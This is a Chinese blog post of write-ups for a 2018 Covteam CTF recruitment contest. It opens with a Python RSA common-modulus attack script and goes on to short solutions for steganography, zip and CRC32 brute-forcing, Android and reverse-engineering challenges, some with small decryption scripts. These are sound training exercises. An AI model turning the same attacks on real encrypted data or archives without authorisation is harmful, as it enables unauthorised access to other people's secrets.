<p>郁离歌大佬的文章：<a href="https://blog.csdn.net/like98k/article/details/79352076" target="_blank" rel="noopener">https://blog.csdn.net/like98k/article/details/79352076</a></p>
<pre><code>from gmpy2 import invert
def egcd(a, b):
  if a == 0:
    return (b, 0, 1)
  else:
    g, y, x = egcd(b % a, a)
    return (g, x - (b // a) * y, y)

def main():
  n = 17362520124149736059291605717839814089431261833972408175766504894876091272021197374480215582589878198406028065354454242540322618614670160317701698407729515781811530180885334265851364490357884909336085410775168953942120359215038925025305363480538685487988827339463890539279008285241711326041868183805848503077373967082910932422798165242481154593794712639251157856102009630894845049984346776659339380886766804814959778048440996937820138560802077375885700500737699904011032451007341777160586467318264288370080315519305800247682611802774996999330812534723806925426052547128371180683265963525581842037399869323246530085399
  c1 = 11757177168629974661319129065020939259607843855964612407515015619551332717303594939284265148421101106538576564879770344246694669035164564635188309876801896156214909946098869029964618647606449218025915092461416329529723153695631060387903820322776063152970417682658882514448192870115306139048632667164375339647480060498038060662339943872320998391726896418231367745182167642401094985859083528539732718585607300300744481583877075988159078923393794888199752412273065186387778708588318818871255432956112609603017152148063465689319082652284861285738454428311471661017770501362483439955249552527930663707069794266908382237863
  c2 = 2364848878397323871885597084235162950454738150033561990125608234733186785294327511676322556989693319543787881108157790541032502889824032246849038028277601291878651138223131738210948288040172974610279550123399373111991951111719314902078119305973622147396199257818150347936553495169543808071509800280778646769553776723985138633331947024508645378935223338224527962766707863670722941767067705851822587652625805245801727869961524972624327839027498877534264770109063202217409037083612774983213841234965045214820133529399280883524064963136158251681946077429913578531311243649928666453318570284124743168193304356485791847813
  e1 = 2333
  e2 = 23333
  s = egcd(e1, e2)
  s1 = s[1]
  s2 = s[2]
  # 求模反元素
  if s1&lt;0:
    s1 = - s1
    c1 = invert(c1, n)
  elif s2&lt;0:
    s2 = - s2
    c2 = invert(c2, n)

  m = pow(c1,s1,n)*pow(c2,s2,n) % n
  print hex(m)[2:].replace(&#39;l&#39;,&#39;&#39;).decode(&#39;hex&#39;)
#  print n2s(m)

if __name__ == &#39;__main__&#39;:
  main()
</code></pre><h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h4 id="大鲨鱼"><a href="#大鲨鱼" class="headerlink" title="大鲨鱼"></a>大鲨鱼</h4><p><img src="https://i.imgur.com/LbtobF1.png" alt=""></p>
<h4 id="Start-in-the-sky"><a href="#Start-in-the-sky" class="headerlink" title="Start in the sky"></a>Start in the sky</h4><p>emmmmm        没什么好说的，右键属性查看详细信息发现flag。</p>
<h4 id="暴力破解"><a href="#暴力破解" class="headerlink" title="暴力破解"></a>暴力破解</h4><p>使用Zipper爆破，纯数字。得到压缩密码，里面就是flag。</p>
<h4 id="pg8"><a href="#pg8" class="headerlink" title="pg8"></a>pg8</h4><p><img src="https://i.imgur.com/JNCub5r.png" alt=""></p>
<h4 id="密码给了谁"><a href="#密码给了谁" class="headerlink" title="密码给了谁"></a>密码给了谁</h4><p>翻看数据包发现了user得到base64码</p>
<p><img src="https://i.imgur.com/Re3LfxR.png" alt=""></p>
<p>解密得到邮箱，从而得到flag</p>
<p><img src="https://i.imgur.com/Ytf7F77.png" alt=""></p>
<h4 id="图种"><a href="#图种" class="headerlink" title="图种"></a>图种</h4><p>图片另存到桌面，修改后缀名为zip，解压缩得flag.txt<br>flag{C16CD2BCE86CF5824E6C2128E6B636CA}</p>
<h4 id="音乐里的秘密"><a href="#音乐里的秘密" class="headerlink" title="音乐里的秘密"></a>音乐里的秘密</h4><p>音乐另存为本地，用au打开发现摩斯密码，解密<br><img src="https://i.imgur.com/Zw1Smsb.png" alt=""></p>
<h4 id="crc32"><a href="#crc32" class="headerlink" title="crc32"></a>crc32</h4><p>根据所给压缩包crc32爆破，使用工具crc32-master</p>
<p><img src="https://i.imgur.com/KnoQsQg.png" alt=""></p>
<p>寻找合适结果组合得压缩包密码ctf_covteam_com_66</p>
<p>解压得covteam.txt</p>
<p><img src="https://i.imgur.com/brodVh7.png" alt=""></p>
<p>二进制转字符</p>
<p><img src="https://i.imgur.com/PVZ7bXt.png" alt=""></p>
<p>得到一张图的base64，转图片得到一张二维码</p>
<p><img src="https://i.imgur.com/2QyLSQG.png" alt=""></p>
<p>解码得flag{D41D8CD98F00B204E9800998ECF8427E}</p>
<h2 id="Android"><a href="#Android" class="headerlink" title="Android"></a>Android</h2><h4 id="easy-andriod"><a href="#easy-andriod" class="headerlink" title="easy andriod"></a>easy andriod</h4><p>在手机上下载下来 随便 输入flag发现输入不能为空和错误的字样</p>
<p><img src="https://i.imgur.com/ViL7dBl.png" alt=""></p>
<p><img src="https://i.imgur.com/sDaRJID.png" alt=""></p>
<h4 id="秘密"><a href="#秘密" class="headerlink" title="秘密"></a>秘密</h4><p><img src="https://i.imgur.com/UASH6RS.png" alt=""></p>
<p>看到Native函数getPass()<br>比较的String来自于这个函数，所以直接逆向.so文件。<br>IDA打开</p>
<p><img src="https://i.imgur.com/OexkgHQ.png" alt=""></p>
<h4 id="这道题只值50分"><a href="#这道题只值50分" class="headerlink" title="这道题只值50分"></a>这道题只值50分</h4><p><img src="https://i.imgur.com/iVUrwNH.png" alt=""></p>
<p><img src="https://i.imgur.com/b7Feza0.png" alt=""></p>
<h2 id="Pwn"><a href="#Pwn" class="headerlink" title="Pwn"></a>Pwn</h2><p><img src="https://i.imgur.com/ILffjwB.png" alt=""></p>
<h2 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h2><h4 id="RE的入门"><a href="#RE的入门" class="headerlink" title="RE的入门"></a>RE的入门</h4><p>直接拖进IDA中 直接F5</p>
<p><img src="https://i.imgur.com/uRcH1bR.png" alt=""></p>
<p>得到flag</p>
<h4 id="宣讲会的RE"><a href="#宣讲会的RE" class="headerlink" title="宣讲会的RE"></a>宣讲会的RE</h4><p>丢入ida中  找到关键的比较函数，比较的是输入和字符串”232+1”。</p>
<p><img src="https://i.imgur.com/KWeqpac.png" alt=""></p>
<h4 id="so-easy-re"><a href="#so-easy-re" class="headerlink" title="so easy re"></a>so easy re</h4><p>解法一：</p>
<p>IDA进去之后会发现字符串{Hacking_for_fun}</p>
<p>后面的操作是将字符串中的i转换为1,r换为1。</p>
<p>所以最后的答案是{Hack1ng_fo1_fun}</p>
<p>解法二</p>
<p>OD载入之后找到关键跳转函数。下断点</p>
<p><img src="https://i.imgur.com/IjJWdZL.png" alt=""></p>
<p>然后执行并输入随意的字符串，长度符合即可。寄存器中可以看到flag。</p>
<p><img src="https://i.imgur.com/Tx4uren.png" alt=""></p>
<h4 id="Easy-Reverse"><a href="#Easy-Reverse" class="headerlink" title="Easy Reverse"></a>Easy Reverse</h4><p><img src="https://i.imgur.com/H5wxoVk.png" alt=""></p>
<p><img src="https://i.imgur.com/l7uDJnE.png" alt=""></p>
<p>解密脚本</p>
<pre><code>byte_8049AE0 = &quot;lk2j9Gh}AgfY4ds-a6QW1#k5ER_T[cvLbV7nOm3ZeX{CMt8SZo]U&quot;
byte_8049B15 = [0x48,0x5D,0x8D,0x24,0x84,0x27,0x99,0x9F,0x54,0x18,0x1E,0x69,0x7E,0x33,0x15,0x72,0x8D,0x33,0x24,0x63,0x21,0x54,0x0C,0x78,0x78,0x78,0x78,0x78,0x1B,0x00,0x00]
flag = &#39;&#39;
for v3 in range(29):
    flag += byte_8049AE0[(byte_8049B15[v3]/3 -2)]
print flag
</code></pre><h4 id="简单的函数加密"><a href="#简单的函数加密" class="headerlink" title="简单的函数加密"></a>简单的函数加密</h4><p>首先PEid查壳</p>
<p><img src="https://i.imgur.com/0LozMQo.png" alt=""></p>
<p>脱壳之后找到关键函数</p>
<p><img src="https://i.imgur.com/nPgUyZd.png" alt=""></p>
<p>写解密脚本</p>
<pre><code>#include &lt;stdio.h&gt;
#include &lt;string.h&gt; 
char cflag[20]={&#39;1&#39;,&#39;f&#39;,&#39;l&#39;,&#39;R&#39;,&#39;{&#39;,&#39;_&#39;,&#39;_&#39;,&#39;a&#39;,&#39;}&#39;,&#39;_&#39;,&#39;3&#39;,&#39;m&#39;,&#39;a&#39;,&#39;2&#39;,&#39;g&#39;,&#39;3&#39;,&#39;e&#39;}; 
void change(int a,int b);
char flag[18];
void change(int a,int b)
{
    cflag[a]^=cflag[b];
    cflag[b]^=cflag[a];
    cflag[a]^=cflag[b];
}
int main()
{
    change(10,15);
    change(1,15);
    change(2,12);
    change(14,10);
    change(16,8);
    change(0,1);
    change(6,5);
    change(8,11);
    change(3,10);
    change(5,12);
    change(1,5);
    change(0,15);
    printf(&quot;%s&quot;,cflag);
}
</code></pre><p><img src="https://i.imgur.com/vpCJSNF.png" alt=""></p>
<p>生活不易，多才多艺。<br>by Covteam—Sma11-Tim3</p>

    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>原文作者：<a href="http://yoursite.com">Sma11_Tim3</a>
            </p><p>原文链接：<a href="http://yoursite.com/2018/10/28/2018Covteam招新赛/">http://yoursite.com/2018/10/28/2018Covteam招新赛/</a>
            </p><p>发表日期：<a href="http://yoursite.com/2018/10/28/2018Covteam招新赛/">October 28th 2018, 1:42:44 pm</a>
            </p><p>更新日期：<a href="http://yoursite.com/2018/10/28/2018Covteam招新赛/">October 28th 2018, 3:09:10 pm</a>
            </p><p>版权声明：本文采用<a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href="/2018/12/27/拜托教务系统强制评价/" title="拜托教务系统强制评价">
                    <div class="nextTitle">拜托教务系统强制评价</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href="/2018/10/28/网鼎杯第一场/" title="网鼎杯第一场">
                    <div class="prevTitle">网鼎杯第一场</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- gitalk评论 -->

    <!-- utteranc评论 -->

    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:825703058@qq.com" class="iconfont-archer email" title="email"></a>
            
        
    
        
            
                <a href="//https://github.com/Sma11Tim3" class="iconfont-archer github" target="_blank" title="github"></a>
            
        
    
        
            
                <span class="iconfont-archer wechat" title="wechat">
                  
                  <img class="profile-qr" src="/assets/example_qr.png">
                </span>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB"><span class="toc-number">1.</span> <span class="toc-text">WEB</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#Easy-XSS"><span class="toc-number">1.0.0.1.</span> <span class="toc-text">Easy XSS</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Maybe-Difficult-XSS"><span class="toc-number">1.0.0.2.</span> <span class="toc-text">Maybe Difficult XSS</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Easy-php"><span class="toc-number">1.0.0.3.</span> <span class="toc-text">Easy php</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#未来chrome"><span class="toc-number">1.0.0.4.</span> <span class="toc-text">未来chrome</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#F12"><span class="toc-number">1.0.0.5.</span> <span class="toc-text">F12</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#变量覆盖"><span class="toc-number">1.0.0.6.</span> <span class="toc-text">变量覆盖</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#简单验证"><span class="toc-number">1.0.0.7.</span> <span class="toc-text">简单验证</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Who-si-he"><span class="toc-number">1.0.0.8.</span> <span class="toc-text">Who si he</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#夏风的日记"><span class="toc-number">1.0.0.9.</span> <span class="toc-text">夏风的日记</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Python"><span class="toc-number">1.0.0.10.</span> <span class="toc-text">Python</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#一-背景知识"><span class="toc-number">1.0.0.11.</span> <span class="toc-text">一 背景知识</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#1-1-yaml"><span class="toc-number">1.0.0.11.1.</span> <span class="toc-text">1.1 yaml</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#1-2-序列化"><span class="toc-number">1.0.0.11.2.</span> <span class="toc-text">1.2 序列化</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#1-3-反序列化"><span class="toc-number">1.0.0.11.3.</span> <span class="toc-text">1.3 反序列化</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#二-出题思路"><span class="toc-number">1.0.0.12.</span> <span class="toc-text">二 出题思路</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#三-解题过程"><span class="toc-number">1.0.0.13.</span> <span class="toc-text">三 解题过程</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#四-复现文件"><span class="toc-number">1.0.0.14.</span> <span class="toc-text">四 复现文件</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Crypto"><span class="toc-number">2.</span> <span class="toc-text">Crypto</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#onetime-pad"><span class="toc-number">2.0.0.1.</span> <span class="toc-text">onetime pad :</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Base全家桶"><span class="toc-number">2.0.1.</span> <span class="toc-text">Base全家桶</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#多次Base64"><span class="toc-number">2.0.2.</span> <span class="toc-text">多次Base64</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#随机Base64"><span class="toc-number">2.0.3.</span> <span class="toc-text">随机Base64</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Easy-RSA"><span class="toc-number">2.0.4.</span> <span class="toc-text">Easy RSA</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MISC"><span class="toc-number">3.</span> <span class="toc-text">MISC</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#大鲨鱼"><span class="toc-number">3.0.1.</span> <span class="toc-text">大鲨鱼</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Start-in-the-sky"><span class="toc-number">3.0.2.</span> <span class="toc-text">Start in the sky</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#暴力破解"><span class="toc-number">3.0.3.</span> <span class="toc-text">暴力破解</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pg8"><span class="toc-number">3.0.4.</span> <span class="toc-text">pg8</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#密码给了谁"><span class="toc-number">3.0.5.</span> <span class="toc-text">密码给了谁</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#图种"><span class="toc-number">3.0.6.</span> <span class="toc-text">图种</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#音乐里的秘密"><span class="toc-number">3.0.7.</span> <span class="toc-text">音乐里的秘密</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#crc32"><span class="toc-number">3.0.8.</span> <span class="toc-text">crc32</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Android"><span class="toc-number">4.</span> <span class="toc-text">Android</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#easy-andriod"><span class="toc-number">4.0.1.</span> <span class="toc-text">easy andriod</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#秘密"><span class="toc-number">4.0.2.</span> <span class="toc-text">秘密</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#这道题只值50分"><span class="toc-number">4.0.3.</span> <span class="toc-text">这道题只值50分</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Pwn"><span class="toc-number">5.</span> <span class="toc-text">Pwn</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Reverse"><span class="toc-number">6.</span> <span class="toc-text">Reverse</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#RE的入门"><span class="toc-number">6.0.1.</span> <span class="toc-text">RE的入门</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#宣讲会的RE"><span class="toc-number">6.0.2.</span> <span class="toc-text">宣讲会的RE</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#so-easy-re"><span class="toc-number">6.0.3.</span> <span class="toc-text">so easy re</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Easy-Reverse"><span class="toc-number">6.0.4.</span> <span class="toc-text">Easy Reverse</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#简单的函数加密"><span class="toc-number">6.0.5.</span> <span class="toc-text">简单的函数加密</span></a></li></ol></li></ol></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 39
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2021 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/17</span><a class="archive-post-title" href="/2021/08/17/图解介绍Tangle第1部分/">图解介绍Tangle第1部分</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/17</span><a class="archive-post-title" href="/2021/08/17/图解介绍Tangle第2部分/">图解介绍Tangle第2部分</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/17</span><a class="archive-post-title" href="/2021/08/17/图解介绍Tangle第3部分/">图解介绍Tangle第3部分</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/17</span><a class="archive-post-title" href="/2021/08/17/图解介绍Tangle第4部分/">图解介绍Tangle第4部分</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/17</span><a class="archive-post-title" href="/2021/08/17/图解介绍Tangle第5部分/">图解介绍Tangle第5部分</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/04</span><a class="archive-post-title" href="/2021/03/04/区块链常用术语汇总/">区块链常用术语汇总</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/04</span><a class="archive-post-title" href="/2021/03/04/M-M-1-K单服务台混合制模型/">M/M/1/K单服务台混合制模型</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/01</span><a class="archive-post-title" href="/2021/03/01/分布式账本之IOTA/">分布式账本之IOTA</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2020 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/28</span><a class="archive-post-title" href="/2020/12/28/共识算法之Tangle(缠结)/">共识算法之Tangle(缠结)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/13</span><a class="archive-post-title" href="/2020/12/13/攻防世界Reverse-Challenge-area/">攻防世界Reverse-Challenge-area</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/03</span><a class="archive-post-title" href="/2020/12/03/ida动态调试elf-无坑详细/">ida动态调试elf(无坑详细)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/02</span><a class="archive-post-title" href="/2020/12/02/MATLAB仿真模拟分布/">MATLAB仿真模拟分布</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/02</span><a class="archive-post-title" href="/2020/12/02/Markov-chain-And-Queuing-theory/">Markov chain And Queuing theory</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/29</span><a class="archive-post-title" href="/2020/11/29/MATLAB使用教程(七)/">MATLAB使用教程(七)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/29</span><a class="archive-post-title" href="/2020/11/29/MATLAB使用教程(五)/">MATLAB使用教程(五)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/29</span><a class="archive-post-title" href="/2020/11/29/MATLAB使用教程(三)/">MATLAB使用教程(三)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/29</span><a class="archive-post-title" href="/2020/11/29/MATLAB使用教程(六)/">MATLAB使用教程(六)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/29</span><a class="archive-post-title" href="/2020/11/29/MATLAB使用教程(九)/">MATLAB使用教程(九)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/29</span><a class="archive-post-title" href="/2020/11/29/MATLAB使用教程(八)/">MATLAB使用教程(八)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/29</span><a class="archive-post-title" href="/2020/11/29/MATLAB使用教程(二)/">MATLAB使用教程(二)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/29</span><a class="archive-post-title" href="/2020/11/29/MATLAB使用教程(四)/">MATLAB使用教程(四)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/29</span><a class="archive-post-title" href="/2020/11/29/MATLAB使用教程(一)/">MATLAB使用教程(一)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/28</span><a class="archive-post-title" href="/2020/10/28/计算机网络数学基础/">计算机网络数学基础</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/14</span><a class="archive-post-title" href="/2020/10/14/红黑树-Red-Black-Tree/">红黑树(Red Black Tree)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/14</span><a class="archive-post-title" href="/2020/10/14/最大网络流量-Maximum-Network-Flow/">最大网络流(Maximum Network Flow)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/11</span><a class="archive-post-title" href="/2020/10/11/Ipad搭建Vscode编程环境/">Ipad搭建Vscode编程环境</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/25</span><a class="archive-post-title" href="/2020/09/25/Blockchain笔记/">Blockchain笔记</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/29</span><a class="archive-post-title" href="/2019/06/29/hello-Covteam/">Hello-Covteam</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/17</span><a class="archive-post-title" href="/2019/03/17/2018蓝桥杯总结/">2018蓝桥杯总结</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2018 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/27</span><a class="archive-post-title" href="/2018/12/27/拜托教务系统强制评价/">拜托教务系统强制评价</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/28</span><a class="archive-post-title" href="/2018/10/28/2018Covteam招新赛/">2018Covteam招新赛</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/28</span><a class="archive-post-title" href="/2018/10/28/80x86汇编知识基础/">80x86汇编知识基础</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/28</span><a class="archive-post-title" href="/2018/10/28/Pwntools使用简介/">Pwntools使用简介</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/28</span><a class="archive-post-title" href="/2018/10/28/Pwn入门笔记/">Pwn入门笔记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/28</span><a class="archive-post-title" href="/2018/10/28/RSA/">RSA</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/28</span><a class="archive-post-title" href="/2018/10/28/逆向入门基础汇编语言/">逆向入门基础汇编语言</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/28</span><a class="archive-post-title" href="/2018/10/28/网鼎杯第一场/">网鼎杯第一场</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/28</span><a class="archive-post-title" href="/2018/10/28/binwalk-for-windows/">binwalk for windows</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/28</span><a class="archive-post-title" href="/2018/10/28/hello-world/">Hello World</a>
        </li>
    
    </ul></div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
        <span class="sidebar-tag-name" data-tags="Blockchain"><span class="iconfont-archer">&#xe606;</span>Blockchain</span>
    
        <span class="sidebar-tag-name" data-tags="Algorithm"><span class="iconfont-archer">&#xe606;</span>Algorithm</span>
    
        <span class="sidebar-tag-name" data-tags="Reverse"><span class="iconfont-archer">&#xe606;</span>Reverse</span>
    
        <span class="sidebar-tag-name" data-tags="Covteam"><span class="iconfont-archer">&#xe606;</span>Covteam</span>
    
        <span class="sidebar-tag-name" data-tags="Daily gadgets"><span class="iconfont-archer">&#xe606;</span>Daily gadgets</span>
    
        <span class="sidebar-tag-name" data-tags="MATLAB"><span class="iconfont-archer">&#xe606;</span>MATLAB</span>
    
        <span class="sidebar-tag-name" data-tags="Pwn"><span class="iconfont-archer">&#xe606;</span>Pwn</span>
    
        <span class="sidebar-tag-name" data-tags="Crypto"><span class="iconfont-archer">&#xe606;</span>Crypto</span>
    
        <span class="sidebar-tag-name" data-tags="CTF"><span class="iconfont-archer">&#xe606;</span>CTF</span>
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br>
    1、请确保node版本大于6.2<br>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
